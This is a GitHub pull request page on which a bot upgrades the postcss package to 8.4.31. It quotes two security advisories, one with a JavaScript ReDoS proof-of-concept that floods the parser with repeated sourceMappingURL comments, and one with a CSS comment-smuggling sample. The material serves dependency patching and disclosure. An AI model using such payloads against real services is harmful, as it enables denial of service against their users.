Skip to content

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Mar 11, 2025

This PR contains the following updates:

Package Change Age Confidence
postcss (source) 8.4.24 -> 8.4.31 age confidence

GitHub Vulnerability Alerts

CVE-2021-23382

The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern

\/\*\s* sourceMappingURL=(.*)

PoC

var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i) try {
            postcss.parse(attack_str) var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}

CVE-2023-44270

An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.

This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.


Release Notes

postcss/postcss (postcss)

v8.4.31

Compare Source

v8.4.30

Compare Source

  • Improved source map performance (by Romain Menke).

v8.4.29

Compare Source

  • Fixed Node#source.offset (by Ido Rosenthal).
  • Fixed docs (by Christian Oliff).

v8.4.28

Compare Source

  • Fixed Root.source.end for better source map (by Romain Menke).
  • Fixed Result.root types when process() has no parser.

v8.4.27

Compare Source

  • Fixed Container clone methods types.

v8.4.26

Compare Source

  • Fixed clone methods types.

v8.4.25

Compare Source


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot added the topic: automation Related to Circle CI, Peril, Renovate, scripts/*, Github Workflows, Github Actions, or Slackbot label Mar 11, 2025
@gatsbot gatsbot bot added the status: triage needed Issue or pull request that need to be triaged and assigned to a reviewer label Mar 11, 2025
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from 51df8bd to f65ad01 Compare March 17, 2025 13:43
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 5 times, most recently from bb0df2a to 4e0aad5 Compare April 2, 2025 12:59
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 5 times, most recently from 22e6175 to b387533 Compare April 9, 2025 06:15
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from be03c3c to 95c641e Compare April 30, 2025 19:52
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from 5017b0d to f3d6391 Compare June 6, 2025 14:25
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from 859df4b to 8637fb1 Compare June 20, 2025 15:59
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from 6fcfb9d to d3d53b8 Compare June 25, 2025 18:51
@serhalp serhalp enabled auto-merge (squash) June 25, 2025 18:51
serhalp
serhalp previously approved these changes Jun 25, 2025
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from d3d53b8 to fef3d20 Compare June 25, 2025 19:02
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 3 times, most recently from cffe32b to 803d624 Compare August 6, 2025 07:34
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 2 times, most recently from c421844 to 450652c Compare August 6, 2025 19:01
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch 6 times, most recently from 4161412 to 818ee34 Compare August 13, 2025 21:26
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from 818ee34 to a17d8f3 Compare August 19, 2025 14:11
@renovate renovate bot force-pushed the renovate/npm-postcss-vulnerability branch from a17d8f3 to 3f21e22 Compare August 31, 2025 11:10
@renovate renovate bot changed the title fix(deps): update dependency postcss to v8.4.31 [security] chore(deps): update dependency postcss to v8.4.31 [security] Sep 25, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

status: triage needed Issue or pull request that need to be triaged and assigned to a reviewer topic: automation Related to Circle CI, Peril, Renovate, scripts/*, Github Workflows, Github Actions, or Slackbot

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant